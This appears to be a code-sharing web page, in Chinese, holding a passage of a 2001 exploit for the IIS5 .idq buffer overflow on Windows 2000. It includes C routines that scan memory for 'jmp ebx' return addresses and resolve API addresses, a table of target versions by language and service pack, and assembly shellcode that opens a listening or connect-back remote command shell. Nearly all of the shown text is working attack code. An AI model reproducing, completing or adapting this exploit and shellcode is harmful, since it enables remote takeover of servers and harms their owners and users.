📄 snake的iis5_idq命令行溢出程序源代码.htm
字号:
lpsz = &( szCreateCode[dwExecCommand_Offset]);
memcpy( lpsz, szExecTemp, wExecCommandSize);
strcat( szOutput, szCreateCode);
strcat( szOutput, "\r\n\r\n");
strcpy( pszOutput, szOutput);
return strlen( pszOutput);
}
//取得 需要 地址 信息
void GetNecesProcAddr( char *szInfo, int iMaxSize)
{
HANDLE hModule = GetModuleHandle("kernel32");
DWORD dwAddr_GetHandle, dwAddr_GetProcAddr;
char szOutput[11024], szJmpAddr[8124], szOne[20];
DWORD dwJmpEbx[100];
WORD wGetJmpCount,w;
wGetJmpCount = Search_Jump_Ebx_Code(dwJmpEbx, 100);
szJmpAddr[0] = 0;
for( w=0; w<wGetJmpCount; w++){
wsprintf( szOne," 0x%X", dwJmpEbx[w]);
strcat( szJmpAddr, szOne);
}
dwAddr_GetHandle = (DWORD)GetProcAddress( (HINSTANCE)hModule,"GetModuleHandleA");
dwAddr_GetProcAddr = (DWORD)GetProcAddress( (HINSTANCE)hModule, "GetProcAddress");
wsprintf( szOutput,"Addr1: 0x%X; Addr2: 0x%X\r\nJJ:%s",
dwAddr_GetHandle, dwAddr_GetProcAddr, szJmpAddr);
//MessageBox( NULL, szOutput, "topic", MB_OK);
strncpy( szInfo, szOutput, iMaxSize);
szInfo[iMaxSize-1] = 0;
}
#define JUMP_EBX_CODE 0xe3ff
//搜索JUMP_EBX的地址
WORD Search_Jump_Ebx_Code(DWORD *dwArray, WORD wMaxCount)
{
HANDLE hDllModule = GetModuleHandle("user32");
char *pValue;
WORD wTemp = JUMP_EBX_CODE;
DWORD dwMin = (DWORD)hDllModule,dwMax;
WORD wCount = 0;
pValue = (char*)dwMin;
wCount = 0;
dwMax = dwMin + 400000; //size is 39kb.
while( ( (DWORD)pValue) < dwMax){
if( *((WORD *)pValue) == JUMP_EBX_CODE){
dwArray[wCount++] = (DWORD)pValue;
if( wCount >= wMaxCount) break;
}
pValue++;
}
return wCount;
}
</PRE><FONT color=#ff00ff><B>文件3. SkShellCodeFunc.h -- 必须的头文件</B></FONT> <PRE>//SkShellCodeFunc.h
////////////////////////////////////////////////////////////////////////////////
// header file for 定义shellcode 函数
////////////////////////////////////////////////////////////////////////////////
// start by snake. 2001/7/11
////////////////////////////////////////////////////////////////////////////////
#ifndef _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
#define _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
enum SYSTEM_TYPE{
IIS5_WIN2K_CHINESE_SP0,
IIS5_WIN2K_CHINESE_SP1,
IIS5_WIN2K_CHINESE_SP2,
IIS5_WIN2K_ENGLISH_SP0,
IIS5_WIN2K_ENGLISH_SP1,
IIS5_WIN2K_ENGLISH_SP2,
IIS5_WIN2K_JAPANESE_SP0,
IIS5_WIN2K_JAPANESE_SP1,
IIS5_WIN2K_JAPANESE_SP2,
IIS_WIN2K_MEXICO_SP0,
IIS_WIN2K_MEXICO_SP1,
IIS_WIN2K_MEXICO_SP2,
MAX_SYSTEM_TYPE_NUM,
};
enum Sk_ConnectType{ CONNECTTYPE_NONE=0, LISTEN_ON_PORT=1, CONNECT_TO_HOST, MAX_CONNECT_TYPE};
typedef struct _ConnectStruct{
BYTE byConnectType;
WORD wListenPort;
DWORD dwConnectIP;
WORD wConnectPort;
}ConnectStruct;
//取得一个系统的名字.
LPCTSTR GetSystemName( SYSTEM_TYPE type);
#endif //_SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11
</PRE><FONT color=#ff00ff><B>文件4.iis_idq.asm --shellcode的汇编代码(编译不需要)</B></FONT> <PRE>;//IIS5_idq.asm
.386p
.model flat,c
;//下面定义 连接 信息 结构.
stConnectInfo struct
byConnectType db 0 ;//=1, 监听; =2,连结外部ip/port.
byReserv1 db 1 ;//nothing just for Word Adjusted.
dwReserv1 dw 1 ;//nothing just for Word Adjusted.
dwListenPort dd 0 ;//DDWORD dwIP1+dwIP2;
dwIP1 dd 0 ;// //IP 和端口,一位用2位表示. 高位为类型,低位为值.
dwIP2 dd 0 ;// 1.高位 =1, 低位为普通value.
dwConnectPort dd 0 ;// 2.高位 = 2, 低位 应该 = value -1
stConnectInfo ends
;//用到的函数 结构
SkOverflowFuncAddr struct
TerminateProcess dd 0;
CreatePipe dd 0;
GetStartupInfoA dd 0;
CreateProcessA dd 0;
PeekNamedPipe dd 0;
GlobalAlloc dd 0;
WriteFile dd 0;
ReadFile dd 0;
Sleep dd 0;
ExitProcess dd 0;
GetLastError dd 0;
DuplicateHandle dd 0;
GetCurrentProcess dd 0;
CloseHandle dd 0;
socket dd 0;
bind dd 0;
listen dd 0;
accept dd 0;
send dd 0;
recv dd 0;
setsockopt dd 0;
WSAStartup dd 0;
closesocket dd 0;
connect dd 0;
gethostname dd 0;
SkOverflowFuncAddr ends
STARTUPINFO struct
cb dd 0;
lpReserved dd 0;
lpDesktop dd 0;
lpTitle dd 0;
dwX dd 0;
dwY dd 0;
dwXSize dd 0;
dwYSize dd 0;
dwXCountChars dd 0;
dwYCountChars dd 0;
dwFillAttribute dd 0;
dwFlags dd 0;
wShowWindow dw 0;
cbReserved2 dw 0;
lpReserved2 dd 0;
hStdInput dd 0;
hStdOutput dd 0;
hStdError dd 0;
STARTUPINFO ends
PROCESS_INFORMATION struct
hProcess dd 0;
hThread dd 0;
dwProcessId dd 0;
dwThreadId dd 0;
PROCESS_INFORMATION ends;
;//管套 - 命令交互 结构
Shell_Cmd_Pipe struct
hReadPipe dd 0;
ShellStdoutPipe dd 0;
hWritePipe dd 0;
ShellStdinPipe dd 0;
msocket dd 0;
ProcessInformation PROCESS_INFORMATION <>;
nstartupinfo STARTUPINFO <>;
Shell_Cmd_Pipe ends
SIZE_OF_TEMP_BUFFER equ 0f0h
;//接受,写管套数据结构.
Recv_Write_Socket_Pipe_Data struct
szTemp db SIZE_OF_TEMP_BUFFER dup(0)
dwBreak DD 0
dwTemp DD 0
Recv_Write_Socket_Pipe_Data ends;
SOCKADDR_IN struct
sin_family dw 0;
sin_port dw 0;
sin_addr dd 0;
sin_zero db 8 dup(0);
SOCKADDR_IN ends
SECURITY_ATTRIBUTES struct
nLength DD 0;
lpSecurityDescriptor DD 0;
bInheritHandle DD 0;
SECURITY_ATTRIBUTES ends;
FUNC_PARAM_1 equ [ebp+8]
FUNC_PARAM_2 equ [ebp+0ch]
FUNC_PARAM_3 equ [ebp+10h]
FUNC_PARAM_4 equ [ebp+14h]
FUNC_PARAM_5 equ [ebp+18h]
FUNC_PARAM_6 equ [ebp+1ch]
FUNC_PARAM_7 equ [ebp+20h]
SO_RCVTIMEO equ 1006h ;// receive timeout
SOL_SOCKET equ 0ffffh ;// options for socket level
Shell_Cmd_Pipe_OFFSET equ 3f0h
SkOverflowFuncAddr_OFFSET equ 2d0h
szShellNeedFunc_OFFSET equ 1d0h
.code
public _sk_Bind_ConnectShellCode
public _GetDataSetOffset_Value
start:
_sk_Bind_ConnectShellCode proc
push ebp;
mov ebp, esp;
;//产生 0x800的堆栈 空间.
xor eax,eax;
inc eax;
shl eax, 0bh; //=>0x800
sub esp, eax;
jmp call_back;
nop;
jump_next:
jmp run_actual1;
call_back:
call jump_next;
call_back_Data_Offset:
;//jmp quit_return; //not run here as no necessary.
;//(void *ptr, int iLen, DWORD dwOld, DWORD dwNew)
_Convert_Add_Sign_To_Null_Sign:
push ebp;
mov ebp, esp;
push edi;
push ecx;
push eax;
push edx;
mov edi, FUNC_PARAM_1; //第1个参数.
mov ecx, FUNC_PARAM_2; //第2个参数.
mov eax, FUNC_PARAM_3; //第3个参数.
mov edx, FUNC_PARAM_4; //第4个参数.
;//重复查找,替换,直到cx = 0
NextAddSign:
repnz scasb;
jcxz Finish_Replace_Add_Sign;
dec edi;
mov byte ptr [edi], dl;
inc ecx;
jmp NextAddSign;
Finish_Replace_Add_Sign:
pop edx;
pop eax;
pop ecx;
pop edi;
pop ebp;
ret;
;//转换eax的long -> ax 标准word.
;//rule: 1.高位 =1, 低位为普通value.
;// 2.高位 = 2, 低位 应该 = value -1
_convert_Sk_Long_To_Ansi_Word:
push ebx;
push ecx;
push edx;
xor edx, edx;
push eax; //低位 ->ebx
pop ebx;
shr ebx, 10h;
push eax; //高位 -> ecx
pop ecx;
_Convert_bx_To_al_Short:
;//处理ebx.
cmp bh, 1;
je _convert_Sk_Long_IsNormal;
dec bl;
_convert_Sk_Long_IsNormal:
mov al, bl;
test edx, edx;
jnz Finish_Convert_Next_Bit;
shl eax, 8;
push ecx;
pop ebx;
inc edx;
jmp _Convert_bx_To_al_Short
Finish_Convert_Next_Bit:
pop edx;
pop ecx;
pop ebx;
ret;
run_actual1:
jmp run_actual2;
;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址
;//void _Get_Overflow_Addr_From_Shell_Func( void *SkOverflowFuncAddr,
;// char *ShellNeedFuncStr,
;// DWORD dwGetModuleHandleAddr,
;// DWORD dwGetProcAddr)
;
_Get_Overflow_Addr_From_Shell_Func:
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov edi, FUNC_PARAM_1; //第1个参数
mov esi, FUNC_PARAM_2; //第2个参数
xor ebx,ebx;
xor ecx,ecx;
mov cl,SHELL_NEED_FUNC_BODY_OFFSET;
add esi, ecx; //esi = szShellCodeNeedFunc+SHELL_NEED_FUNC_BODY_OFFSET
mov cl, byte ptr [esi];
inc esi;
_NextDllNameToLoad:
push ecx;
mov bl, byte ptr [esi];
inc esi; //skip size.
push esi;
mov eax, FUNC_PARAM_3; //第3个参数.
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call eax;
add esi, ebx; //go to next address.
;//现在,esi指向 函数 数目.
xor ecx, ecx;
mov cl, byte ptr [esi];
inc esi;
;//现在,load每个function.
_NextFunction_Addr:
push ecx;
;//取字符串的大小
mov bl, byte ptr [esi];
inc esi;
push eax;
push esi;
push esi; //procName
push eax; //module
mov ecx, FUNC_PARAM_4; //第3个参数.
;//mov eax, GetModuleHandleA_Addr; //GetModuleHandleA
call ecx;
mov dword ptr [edi], eax;
add edi, 4;
pop esi;
pop eax;
add esi, ebx; //指针移动到下一个字符串.
pop ecx;
loop _NextFunction_Addr;
pop ecx;
loop _NextDllNameToLoad;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
pop ebp;
ret;
run_actual2:
jmp run_actual3_1;
;//创建 一个管套,监听一个端口,返回该管套.
;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
_Create_Bind_Connect_Socket_To_Port:
push ebp;
mov ebp, esp;
xor eax, eax; //开辟0xff(256)个byte的变量区域.
mov ax, 3f0h
sub esp, eax;
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1; //第一个参数.
;//WSAStartup(werd,&wsd);
lea edi, [ebp-340h]; //开辟个空间做临时变量.
xor eax, eax;
mov al,2;
push edi;
push eax;
mov eax, [esi+SkOverflowFuncAddr.WSAStartup];
call eax;
;//msocket = socket( AF_INET, SOCK_STREAM, 0); = (2,1,0)
xor eax, eax;
push eax;
inc eax;
push eax;
inc eax;
push eax;
mov eax, [esi+SkOverflowFuncAddr.socket];
call eax;
;//取连结类型
mov edx, FUNC_PARAM_2;
lea ebx, [edx+stConnectInfo.byConnectType];
mov cl, BYTE PTR [ebx];
push eax;
;//准备参数 SOCKADDR_IN
lea edi, [ebp-0f0h]; //现在是sockaddr_in的地址.
lea ebx, [edi + SOCKADDR_IN.sin_family];
xor eax, eax;
mov al,2;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -